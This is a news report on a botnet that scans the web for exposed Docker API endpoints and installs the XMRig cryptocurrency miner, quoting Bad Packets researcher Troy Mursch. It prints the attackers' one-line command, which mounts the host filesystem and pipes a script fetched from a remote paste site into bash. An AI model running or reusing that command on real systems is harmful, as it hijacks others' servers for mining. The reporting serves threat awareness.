A group of hackers is presently mass-scanning the web seeking for Docker services that have exposed API endpoints online.
The reasons of these scans is to let the group of hackers to send instructions to the Docker instance and set up a cryptocurrency miner on Docker instances of a firm, to create funds for the own profits of the group.
This meticulous mass-scanning mission began over the last week and instantaneously stood out owing to its utter size.
“Consumers of the Bad Packets CTI API will notice that exploit activity aiming at Docker instances (exposed) happens quite often and is nothing new,” co-founder and chief research officer at Bad Packets LLC, Troy Mursch, claimed to the media in an interview.
“What set this mission apart was the huge increment of scanning activity. This single-handedly warranted additional probe to check out what this botnet was planning,” he claimed.
“As others have taken notice, this is not your average exploit attempt,” Mursch, who found about the campaign, claimed to the media. “There was a reasonable amount of effort placed into this campaign, and we have not entirely analyzed every single obsession as of yet it does.”
What we know till now is that the hackers are presently scanning over 59,000 netblocks (IP networks) seeking for exposed instances of Docker.
Once the hackers identify an exposed host, they employ the API endpoint to begin an Alpine Linux OS container where they use the following command to exploit:
chroot /mnt /bin/sh -c ‘curl -sL4 http://ix.io/1XQa | bash;
The abovementioned command runs and downloads a Bash script from the server of the attackers. This script sets up a typical cryptocurrency miner (XMRRig). Within 2 Days since this campaign has been live, the team has already mined 14.82 XMR (), worth just more than $740, Mursch claimed.